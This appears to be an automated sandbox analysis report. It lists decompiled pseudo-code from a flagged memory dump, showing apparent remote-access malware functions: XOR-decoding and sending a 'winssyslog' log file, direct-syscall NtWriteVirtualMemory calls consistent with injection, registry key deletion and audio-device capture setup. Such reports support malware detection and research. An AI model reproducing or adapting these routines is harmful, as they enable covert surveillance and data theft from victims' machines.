                                                                                    				signed int _t19;
                                                                                    				void* _t30;
                                                                                    				long _t41;
                                                                                    				void* _t56;
                                                                                    				void* _t58;
                                                                                    				void* _t59;
                                                                                    				void* _t61;
                                                                                    				long _t62;
                                                                                    				signed int _t65;
                                                                                    
                                                                                    				_t19 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t19 ^ _t65;
                                                                                    				_v540 = __ecx;
                                                                                    				_push(0);
                                                                                    				_v532 = 0;
                                                                                    				E04EC6330(__ebx, L"winssyslog",  &_v528, __edi, __esi, 8);
                                                                                    				_t58 = CreateFileW( &_v528, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                    				_v544 = _t58;
                                                                                    				_t72 = _t58 - 0xffffffff;
                                                                                    				if(_t58 == 0xffffffff) {
                                                                                    					__eflags = _v8 ^ _t65;
                                                                                    					return E04ED572E(_v8 ^ _t65);
                                                                                    				} else {
                                                                                    					_push(__ebx);
                                                                                    					_push(__esi);
                                                                                    					_t41 = GetFileSize(_t58, 0);
                                                                                    					_push(_t41);
                                                                                    					_t61 = E04ED5785(L"winssyslog", __esi, _t72);
                                                                                    					_v536 = _t61;
                                                                                    					ReadFile(_t58, _t61, _t41,  &_v532, 0);
                                                                                    					_t30 = 0;
                                                                                    					if(_t41 != 0) {
                                                                                    						if(_t41 >= 0x20) {
                                                                                    							asm("movaps xmm2, [0x4efe8f0]");
                                                                                    							_t56 = _t41 - (_t41 & 0x0000001f);
                                                                                    							asm("o16 nop [eax+eax]");
                                                                                    							do {
                                                                                    								asm("movups xmm0, [esi+eax]");
                                                                                    								asm("movaps xmm1, xmm2");
                                                                                    								asm("pxor xmm1, xmm0");
                                                                                    								asm("movups [esi+eax], xmm1");
                                                                                    								asm("movups xmm0, [esi+eax+0x10]");
                                                                                    								asm("pxor xmm0, xmm2");
                                                                                    								asm("movups [esi+eax+0x10], xmm0");
                                                                                    								_t30 = _t30 + 0x20;
                                                                                    							} while (_t30 < _t56);
                                                                                    						}
                                                                                    						while(_t30 < _t41) {
                                                                                    							 *(_t30 + _t61) =  *(_t30 + _t61) ^ 0x00000058;
                                                                                    							_t30 = _t30 + 1;
                                                                                    						}
                                                                                    					}
                                                                                    					_t11 = _t41 + 1; // 0x1
                                                                                    					_t62 = _t11;
                                                                                    					_t59 = LocalAlloc(0x40, _t62);
                                                                                    					_t13 = _t59 + 1; // 0x1
                                                                                    					 *_t59 = 0x7f;
                                                                                    					E04EDDC90(_t13, _v536, _t41);
                                                                                    					_push(0x3f);
                                                                                    					_push(_t62);
                                                                                    					E04EB1C60( *((intOrPtr*)(_v540 + 4)));
                                                                                    					LocalFree(_t59);
                                                                                    					E04ED573F(_v536);
                                                                                    					CloseHandle(_v544);
                                                                                    					return E04ED572E(_v8 ^ _t65, _t59);
                                                                                    				}
                                                                                    			}

                                                                                    0x04ebb6b9
                                                                                    0x04ebb6c0
                                                                                    0x04ebb6c4
                                                                                    0x04ebb6d0
                                                                                    0x04ebb6d9
                                                                                    0x04ebb6e3
                                                                                    0x04ebb70a
                                                                                    0x04ebb70c
                                                                                    0x04ebb712
                                                                                    0x04ebb715
                                                                                    0x04ebb80e
                                                                                    0x04ebb819
                                                                                    0x04ebb71b
                                                                                    0x04ebb71b
                                                                                    0x04ebb71c
                                                                                    0x04ebb726
                                                                                    0x04ebb728
                                                                                    0x04ebb731
                                                                                    0x04ebb739
                                                                                    0x04ebb745
                                                                                    0x04ebb74b
                                                                                    0x04ebb74f
                                                                                    0x04ebb754
                                                                                    0x04ebb756
                                                                                    0x04ebb764
                                                                                    0x04ebb766
                                                                                    0x04ebb770
                                                                                    0x04ebb770
                                                                                    0x04ebb774
                                                                                    0x04ebb777
                                                                                    0x04ebb77b
                                                                                    0x04ebb77f
                                                                                    0x04ebb784
                                                                                    0x04ebb788
                                                                                    0x04ebb78d
                                                                                    0x04ebb790
                                                                                    0x04ebb770
                                                                                    0x04ebb796
                                                                                    0x04ebb798
                                                                                    0x04ebb79c
                                                                                    0x04ebb79d
                                                                                    0x04ebb796
                                                                                    0x04ebb7a1
                                                                                    0x04ebb7a1
                                                                                    0x04ebb7ad
                                                                                    0x04ebb7b7
                                                                                    0x04ebb7ba
                                                                                    0x04ebb7be
                                                                                    0x04ebb7cf
                                                                                    0x04ebb7d1
                                                                                    0x04ebb7d3
                                                                                    0x04ebb7db
                                                                                    0x04ebb7e2
                                                                                    0x04ebb7f0
                                                                                    0x04ebb808
                                                                                    0x04ebb808

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6330: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC6356
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,74E06490), ref: 04EBB704
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,74E06490), ref: 04EBB720
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,74E06490), ref: 04EBB745
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,74E06490), ref: 04EBB7A7
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F,?,?,00000000,?,74E06490), ref: 04EBB7DB
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,74E06490), ref: 04EBB7F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                                                    • String ID: $winssyslog
                                                                                    • API String ID: 245316060-3650450327
                                                                                    • Opcode ID: fb1382e23f81281a00671a34817a843e0173ff22fb52100c813809f01556cf46
                                                                                    • Instruction ID: a080d5596e008832593f72b3a1e51de6ec970c30be2e4fa50660fb960364c96b
                                                                                    • Opcode Fuzzy Hash: fb1382e23f81281a00671a34817a843e0173ff22fb52100c813809f01556cf46
                                                                                    • Instruction Fuzzy Hash: E5416D31A003186BE7209F74DC85FFAB7A8EF95304F1046A9FD49A7181EF74B9458790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 60%
                                                                                    			E04EC8E80(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v20;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				char _t11;
                                                                                    				intOrPtr* _t16;
                                                                                    				intOrPtr _t27;
                                                                                    				void* _t28;
                                                                                    				intOrPtr _t30;
                                                                                    				_Unknown_base(*)()* _t31;
                                                                                    				intOrPtr _t33;
                                                                                    				void* _t34;
                                                                                    				intOrPtr* _t35;
                                                                                    				struct HINSTANCE__* _t36;
                                                                                    				intOrPtr _t39;
                                                                                    				void* _t41;
                                                                                    
                                                                                    				_t33 = __edx;
                                                                                    				_t39 =  *0x4f06b54; // 0x7ffc
                                                                                    				_t27 = __edx;
                                                                                    				_v8 = __ecx;
                                                                                    				_t30 =  *0x4f06b50; // 0x8dcda6c0
                                                                                    				_push(_t34);
                                                                                    				if(_t30 != 0 || _t39 != 0) {
                                                                                    					L7:
                                                                                    					_t35 = _a16;
                                                                                    					if(_t35 == 0) {
                                                                                    						_t11 = 0;
                                                                                    					} else {
                                                                                    						_t11 =  *_t35;
                                                                                    					}
                                                                                    					_v20 = _t11;
                                                                                    					asm("cdq");
                                                                                    					_push(_t33);
                                                                                    					_push( &_v20);
                                                                                    					_push(0);
                                                                                    					_push(_a12);
                                                                                    					_v16 = 0;
                                                                                    					asm("cdq");
                                                                                    					_push(_t33);
                                                                                    					_push(_t27);
                                                                                    					_push(_a8);
                                                                                    					asm("cdq");
                                                                                    					_t28 = E04EC8170(_t30, _t39, 5, _v8, _t33, _a4);
                                                                                    					if(_t28 != 0 || _t33 != 0) {
                                                                                    						_t16 =  *0x4f06b48;
                                                                                    						if(_t16 == 0) {
                                                                                    							L17:
                                                                                    							_t36 = GetModuleHandleW(L"ntdll.dll");
                                                                                    							 *0x4f06b48 = GetProcAddress(_t36, "RtlNtStatusToDosError");
                                                                                    							_t31 = GetProcAddress(_t36, "RtlSetLastWin32Error");
                                                                                    							_t16 =  *0x4f06b48;
                                                                                    							 *0x4f06b28 = _t31;
                                                                                    						} else {
                                                                                    							_t31 =  *0x4f06b28;
                                                                                    							if(_t31 == 0) {
                                                                                    								goto L17;
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t16 != 0 && _t31 != 0) {
                                                                                    							RtlRestoreLastWin32Error( *_t16(_t28));
                                                                                    						}
                                                                                    						goto L21;
                                                                                    					} else {
                                                                                    						if(_t35 != 0) {
                                                                                    							 *_t35 = _v20;
                                                                                    						}
                                                                                    						return 1;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t25 =  *0x4f06b40; // 0x8dc40000
                                                                                    					_t33 =  *0x4f06b44; // 0x7ffc
                                                                                    					if(_t25 == 0 && _t33 == 0) {
                                                                                    						 *0x4f06b40 = E04EC8350(_t30);
                                                                                    						 *0x4f06b44 = _t33;
                                                                                    					}
                                                                                    					_t30 = E04EC8B50(_t27, "NtWriteVirtualMemory", _t33, _t34, _t39, _t25, _t33);
                                                                                    					_t41 = _t41 + 8;
                                                                                    					 *0x4f06b50 = _t30;
                                                                                    					_t39 = _t33;
                                                                                    					 *0x4f06b54 = _t39;
                                                                                    					if(_t30 != 0 || _t39 != 0) {
                                                                                    						goto L7;
                                                                                    					} else {
                                                                                    						L21:
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x04ec8e80
                                                                                    0x04ec8e88
                                                                                    0x04ec8e8e
                                                                                    0x04ec8e90
                                                                                    0x04ec8e93
                                                                                    0x04ec8e99
                                                                                    0x04ec8e9c
                                                                                    0x04ec8ef0
                                                                                    0x04ec8ef0
                                                                                    0x04ec8ef5
                                                                                    0x04ec8efb
                                                                                    0x04ec8ef7
                                                                                    0x04ec8ef7
                                                                                    0x04ec8ef7
                                                                                    0x04ec8efd
                                                                                    0x04ec8f03
                                                                                    0x04ec8f04
                                                                                    0x04ec8f05
                                                                                    0x04ec8f06
                                                                                    0x04ec8f08
                                                                                    0x04ec8f0d
                                                                                    0x04ec8f14
                                                                                    0x04ec8f15
                                                                                    0x04ec8f16
                                                                                    0x04ec8f17
                                                                                    0x04ec8f20
                                                                                    0x04ec8f2c
                                                                                    0x04ec8f33
                                                                                    0x04ec8f4e
                                                                                    0x04ec8f55
                                                                                    0x04ec8f61
                                                                                    0x04ec8f72
                                                                                    0x04ec8f82
                                                                                    0x04ec8f89
                                                                                    0x04ec8f8b
                                                                                    0x04ec8f90
                                                                                    0x04ec8f57
                                                                                    0x04ec8f57
                                                                                    0x04ec8f5f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec8f5f
                                                                                    0x04ec8f98
                                                                                    0x04ec8fa2
                                                                                    0x04ec8fa2
                                                                                    0x00000000
                                                                                    0x04ec8f39
                                                                                    0x04ec8f3b
                                                                                    0x04ec8f40
                                                                                    0x04ec8f40
                                                                                    0x04ec8f4d
                                                                                    0x04ec8f4d
                                                                                    0x04ec8ea2
                                                                                    0x04ec8ea2
                                                                                    0x04ec8ea7
                                                                                    0x04ec8eaf
                                                                                    0x04ec8eba
                                                                                    0x04ec8ebf
                                                                                    0x04ec8ebf
                                                                                    0x04ec8ed1
                                                                                    0x04ec8ed3
                                                                                    0x04ec8ed6
                                                                                    0x04ec8edc
                                                                                    0x04ec8ede
                                                                                    0x04ec8ee6
                                                                                    0x00000000
                                                                                    0x04ec8fa8
                                                                                    0x04ec8fa8
                                                                                    0x04ec8fb0
                                                                                    0x04ec8fb0
                                                                                    0x04ec8ee6

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,00000000,00000000,04ECBC35,04EC90B9,00000000), ref: 04EC8F66
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04EC8F7A
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04EC8F87
                                                                                    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04EC8FA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                    • String ID: NtWriteVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                    • API String ID: 3496116238-1394624420
                                                                                    • Opcode ID: a3478f2bcc67281685f2fd6f8e31c1e79f80166e8dda037831c334600b569b95
                                                                                    • Instruction ID: 6c16d5e9376de4e6a95e041862fdc1b03d3399202f230698f507d425af02d0c8
                                                                                    • Opcode Fuzzy Hash: a3478f2bcc67281685f2fd6f8e31c1e79f80166e8dda037831c334600b569b95
                                                                                    • Instruction Fuzzy Hash: E33145F5B002199FEB14AF59AF40A7B77AAFBC471AB04512DFD09D3200E774AC528750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 83%
                                                                                    			E04EBEE90(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				signed int _t29;
                                                                                    				signed int _t38;
                                                                                    				intOrPtr* _t43;
                                                                                    				void* _t45;
                                                                                    				void* _t46;
                                                                                    				signed int _t54;
                                                                                    				intOrPtr* _t57;
                                                                                    				intOrPtr* _t68;
                                                                                    				void* _t70;
                                                                                    				void* _t71;
                                                                                    				signed int _t72;
                                                                                    				intOrPtr* _t75;
                                                                                    				signed int _t76;
                                                                                    				void* _t77;
                                                                                    
                                                                                    				_t29 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t29 ^ _t76;
                                                                                    				_t57 =  *0x4f06aec; // 0x339e680
                                                                                    				_t70 = __ecx;
                                                                                    				_t75 =  *_t57;
                                                                                    				_v612 = __ecx;
                                                                                    				while(_t75 != _t57) {
                                                                                    					while( *_t43 ==  *_t68) {
                                                                                    						_t43 = _t43 + 4;
                                                                                    						_t68 = _t68 + 4;
                                                                                    						_t71 = _t71 - 4;
                                                                                    						if(_t71 >= 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						if( *_t43 ==  *_t68) {
                                                                                    							_t72 =  *(_t75 + 8);
                                                                                    							_t45 =  *_t72;
                                                                                    							__eflags =  *(_t45 + 4);
                                                                                    							 *(_t72 + 0x28) = 1;
                                                                                    							 *(_t72 + 0x24) = 0;
                                                                                    							if( *(_t45 + 4) != 0) {
                                                                                    								L11:
                                                                                    								_t46 =  *(_t72 + 0x20);
                                                                                    								__eflags = _t46;
                                                                                    								if(_t46 != 0) {
                                                                                    									WaitForSingleObject(_t46, 0xffffffff);
                                                                                    									CloseHandle( *(_t72 + 0x20));
                                                                                    									 *(_t72 + 0x20) = 0;
                                                                                    								}
                                                                                    								L13:
                                                                                    								 *(_t72 + 0x28) = 0;
                                                                                    								_t73 =  *(_t75 + 8);
                                                                                    								__eflags =  *(_t75 + 8);
                                                                                    								if(__eflags != 0) {
                                                                                    									E04EBE250(_t73, __eflags);
                                                                                    									_push(0x30);
                                                                                    									E04ED5777(_t73);
                                                                                    									_t77 = _t77 + 8;
                                                                                    								}
                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_t75 + 4)))) =  *_t75;
                                                                                    								 *((intOrPtr*)( *_t75 + 4)) =  *((intOrPtr*)(_t75 + 4));
                                                                                    								 *0x4f06af0 =  *0x4f06af0 - 1;
                                                                                    								__eflags =  *0x4f06af0;
                                                                                    								L04ED57B1(_t75);
                                                                                    								_t70 = _v612;
                                                                                    								_t77 = _t77 + 4;
                                                                                    								goto L16;
                                                                                    							}
                                                                                    							_t66 =  *(_t72 + 0x2c);
                                                                                    							__eflags =  *(_t72 + 0x2c);
                                                                                    							if( *(_t72 + 0x2c) == 0) {
                                                                                    								goto L13;
                                                                                    							}
                                                                                    							_t54 = E04EBD240(_t66, "stop");
                                                                                    							__eflags = _t54;
                                                                                    							if(_t54 == 0) {
                                                                                    								goto L13;
                                                                                    							}
                                                                                    							 *_t54();
                                                                                    							goto L11;
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_t75 =  *_t75;
                                                                                    					_t70 = _v612;
                                                                                    				}
                                                                                    				L16:
                                                                                    				__eflags = _a4;
                                                                                    				if(_a4 != 0) {
                                                                                    					E04EC6010(_t57, L"Pg",  &_v88, _t70, _t75);
                                                                                    					wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, _t70);
                                                                                    					_v612 = 0;
                                                                                    					_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v612);
                                                                                    					__eflags = _t38;
                                                                                    					if(_t38 == 0) {
                                                                                    						SHDeleteKeyW(_v612, 0x4efb5d0);
                                                                                    						RegCloseKey(_v612);
                                                                                    					}
                                                                                    				}
                                                                                    				__eflags = _v8 ^ _t76;
                                                                                    				return E04ED572E(_v8 ^ _t76);
                                                                                    			}
                                                                                    0x04ebee99
                                                                                    0x04ebeea0
                                                                                    0x04ebeea4
                                                                                    0x04ebeeac
                                                                                    0x04ebeeae
                                                                                    0x04ebeeb0
                                                                                    0x04ebeeb6
                                                                                    0x04ebeed0
                                                                                    0x04ebeed6
                                                                                    0x04ebeed9
                                                                                    0x04ebeedc
                                                                                    0x04ebeedf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebeee5
                                                                                    0x04ebeef1
                                                                                    0x04ebeef4
                                                                                    0x04ebeef6
                                                                                    0x04ebeefa
                                                                                    0x04ebef01
                                                                                    0x04ebef08
                                                                                    0x04ebef21
                                                                                    0x04ebef21
                                                                                    0x04ebef24
                                                                                    0x04ebef26
                                                                                    0x04ebef2b
                                                                                    0x04ebef34
                                                                                    0x04ebef3a
                                                                                    0x04ebef3a
                                                                                    0x04ebef41
                                                                                    0x04ebef41
                                                                                    0x04ebef48
                                                                                    0x04ebef4b
                                                                                    0x04ebef4d
                                                                                    0x04ebef51
                                                                                    0x04ebef56
                                                                                    0x04ebef59
                                                                                    0x04ebef5e
                                                                                    0x04ebef5e
                                                                                    0x04ebef67
                                                                                    0x04ebef6e
                                                                                    0x04ebef71
                                                                                    0x04ebef71
                                                                                    0x04ebef77
                                                                                    0x04ebef7c
                                                                                    0x04ebef82
                                                                                    0x00000000
                                                                                    0x04ebef82
                                                                                    0x04ebef0a
                                                                                    0x04ebef0d
                                                                                    0x04ebef0f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebef16
                                                                                    0x04ebef1b
                                                                                    0x04ebef1d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebef1f
                                                                                    0x00000000
                                                                                    0x04ebef1f
                                                                                    0x00000000
                                                                                    0x04ebeee5
                                                                                    0x04ebeee7
                                                                                    0x04ebeee9
                                                                                    0x04ebeee9
                                                                                    0x04ebef85
                                                                                    0x04ebef85
                                                                                    0x04ebef89
                                                                                    0x04ebef93
                                                                                    0x04ebefa9
                                                                                    0x04ebefb2
                                                                                    0x04ebefd6
                                                                                    0x04ebefdc
                                                                                    0x04ebefde
                                                                                    0x04ebefeb
                                                                                    0x04ebeff7
                                                                                    0x04ebeff7
                                                                                    0x04ebefde
                                                                                    0x04ebf002
                                                                                    0x04ebf00d

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000001), ref: 04EBEF2B
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EBEF34
                                                                                    • wsprintfW.USER32 ref: 04EBEFA9
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 04EBEFD6
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EBEFEB
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBEFF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteHandleObjectOpenSingleWaitwsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s\%s$stop
                                                                                    • API String ID: 1878782464-96441376
                                                                                    • Opcode ID: 22c1c2fa6e3c39f440bc57a4cf1ca34052d6af6cad0288fab35e4f6c7fda611b
                                                                                    • Instruction ID: 2add391681ed4b65bf89fc5aa63e51c26e80f2ed4ed167a11a7faeafc803dc0b
                                                                                    • Opcode Fuzzy Hash: 22c1c2fa6e3c39f440bc57a4cf1ca34052d6af6cad0288fab35e4f6c7fda611b
                                                                                    • Instruction Fuzzy Hash: 8441AE31600208EFE724DF68DC84BEAB7B5FF88314F145198E98AA7650DB76BD54DB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 64%
                                                                                    			E04EC8D50(intOrPtr __ecx, intOrPtr __edx, char _a4, intOrPtr _a8) {
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v28;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t18;
                                                                                    				intOrPtr _t28;
                                                                                    				void* _t29;
                                                                                    				_Unknown_base(*)()* _t31;
                                                                                    				intOrPtr _t33;
                                                                                    				intOrPtr _t34;
                                                                                    				struct HINSTANCE__* _t35;
                                                                                    				intOrPtr _t36;
                                                                                    				void* _t38;
                                                                                    
                                                                                    				_t33 = __edx;
                                                                                    				_t36 =  *0x4f06b24; // 0x7ffc
                                                                                    				_t28 = __edx;
                                                                                    				_t34 =  *0x4f06b20; // 0x8dcda340
                                                                                    				_v8 = __ecx;
                                                                                    				if(_t34 != 0 || _t36 != 0) {
                                                                                    					L7:
                                                                                    					_v28 = _a4;
                                                                                    					_push(0);
                                                                                    					_v24 = _a8;
                                                                                    					_push(0x4000);
                                                                                    					asm("cdq");
                                                                                    					_push(_t33);
                                                                                    					_push( &_v20);
                                                                                    					_v20 = _t28;
                                                                                    					asm("cdq");
                                                                                    					_push(_t33);
                                                                                    					asm("cdq");
                                                                                    					_v16 = 0;
                                                                                    					_t29 = E04EC8170(_t34, _t36, 4, _v8, _t33,  &_v28);
                                                                                    					if(_t29 != 0 || _t33 != 0) {
                                                                                    						_t18 =  *0x4f06b48;
                                                                                    						if(_t18 == 0) {
                                                                                    							L12:
                                                                                    							_t35 = GetModuleHandleW(L"ntdll.dll");
                                                                                    							 *0x4f06b48 = GetProcAddress(_t35, "RtlNtStatusToDosError");
                                                                                    							_t31 = GetProcAddress(_t35, "RtlSetLastWin32Error");
                                                                                    							_t18 =  *0x4f06b48;
                                                                                    							 *0x4f06b28 = _t31;
                                                                                    						} else {
                                                                                    							_t31 =  *0x4f06b28;
                                                                                    							if(_t31 == 0) {
                                                                                    								goto L12;
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t18 != 0 && _t31 != 0) {
                                                                                    							RtlRestoreLastWin32Error( *_t18(_t29));
                                                                                    						}
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						_t11 = _t29 + 1; // 0x1
                                                                                    						return _t11;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t26 =  *0x4f06b40; // 0x8dc40000
                                                                                    					_t33 =  *0x4f06b44; // 0x7ffc
                                                                                    					if(_t26 == 0 && _t33 == 0) {
                                                                                    						 *0x4f06b40 = E04EC8350(__ecx);
                                                                                    						 *0x4f06b44 = _t33;
                                                                                    					}
                                                                                    					_t34 = E04EC8B50(_t28, "NtFreeVirtualMemory", _t33, _t34, _t36, _t26, _t33);
                                                                                    					_t38 = _t38 + 8;
                                                                                    					 *0x4f06b20 = _t34;
                                                                                    					_t36 = _t33;
                                                                                    					 *0x4f06b24 = _t36;
                                                                                    					if(_t34 != 0 || _t36 != 0) {
                                                                                    						goto L7;
                                                                                    					} else {
                                                                                    						L16:
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,00000000,00000000,04ECBC35,?,?,04EC91F7), ref: 04EC8E27
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04EC8E3B
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04EC8E48
                                                                                    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04EC8E63
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                    • String ID: NtFreeVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                    • API String ID: 3496116238-2303597063
                                                                                    • Opcode ID: 1df4dcea06c30186ba8cd3364bdb615a255e0d2dc7791e679bfe821058e8ecf2
                                                                                    • Instruction ID: 291bec52ed908ae1d98fa2af5207400651c45320aae67277335826c116d67877
                                                                                    • Opcode Fuzzy Hash: 1df4dcea06c30186ba8cd3364bdb615a255e0d2dc7791e679bfe821058e8ecf2
                                                                                    • Instruction Fuzzy Hash: 703145F5A002199FE714EF59AE40A7ABBFDFBC8719B04512EED04D7200E774AD518B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 67%
                                                                                    			E04EB2000(intOrPtr* __ecx, intOrPtr _a4, char _a7) {
                                                                                    				void* _v12;
                                                                                    				char _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				char _v24;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t18;
                                                                                    				intOrPtr _t23;
                                                                                    				intOrPtr _t29;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t36;
                                                                                    
                                                                                    				_t18 = _a4;
                                                                                    				_t33 = __ecx;
                                                                                    				 *__ecx = 0x4efd8b0;
                                                                                    				 *((intOrPtr*)(__ecx + 4)) = _t18;
                                                                                    				 *((intOrPtr*)(_t18 + 0x38)) = __ecx;
                                                                                    				 *(_t33 + 8) = CreateEventW(0, 1, 0, 0);
                                                                                    				 *_t33 = 0x4efc858;
                                                                                    				if(waveInGetNumDevs() != 0) {
                                                                                    					_t47 =  *0x4f068c8;
                                                                                    					if( *0x4f068c8 == 0) {
                                                                                    						_t36 = E04ED5744(CreateEventW, _t47, 0x5c);
                                                                                    						_t23 = E04EB1190(_t36, _t47);
                                                                                    						_push(_t36);
                                                                                    						_push(0x3f);
                                                                                    						 *((intOrPtr*)(_t33 + 0xc)) = _t23;
                                                                                    						_push(1);
                                                                                    						_push( &_a7);
                                                                                    						 *0x4f068c8 = 1;
                                                                                    						_a7 = 0x7c;
                                                                                    						E04EB1C60( *((intOrPtr*)(_t33 + 4)));
                                                                                    						WaitForSingleObject( *(_t33 + 8), 0xffffffff);
                                                                                    						Sleep(0x96);
                                                                                    						_v24 = E04EB2220;
                                                                                    						_v20 = _t33;
                                                                                    						_v16 = 0;
                                                                                    						_v12 = CreateEventW(0, 0, 0, 0);
                                                                                    						_t29 = E04EDF4C7( *((intOrPtr*)(_t33 + 4)), 0, 0, E04EC53C0,  &_v24, 0, 0);
                                                                                    						WaitForSingleObject(_v12, 0xffffffff);
                                                                                    						CloseHandle(_v12);
                                                                                    						 *((intOrPtr*)(_t33 + 0x10)) = _t29;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t33;
                                                                                    			}

                                                                                    0x04eb2003
                                                                                    0x04eb2011
                                                                                    0x04eb2019
                                                                                    0x04eb201f
                                                                                    0x04eb2024
                                                                                    0x04eb2029
                                                                                    0x04eb202c
                                                                                    0x04eb203a
                                                                                    0x04eb2040
                                                                                    0x04eb2047
                                                                                    0x04eb2057
                                                                                    0x04eb2059
                                                                                    0x04eb205e
                                                                                    0x04eb2062
                                                                                    0x04eb2064
                                                                                    0x04eb206a
                                                                                    0x04eb206c
                                                                                    0x04eb206d
                                                                                    0x04eb2074
                                                                                    0x04eb2078
                                                                                    0x04eb2082
                                                                                    0x04eb208d
                                                                                    0x04eb209b
                                                                                    0x04eb20a2
                                                                                    0x04eb20a5
                                                                                    0x04eb20af
                                                                                    0x04eb20bf
                                                                                    0x04eb20ce
                                                                                    0x04eb20d7
                                                                                    0x04eb20dd
                                                                                    0x04eb20dd
                                                                                    0x04eb2047
                                                                                    0x04eb20e7

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EB2027
                                                                                    • waveInGetNumDevs.WINMM ref: 04EB2032
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11A9
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11B6
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04EB2082
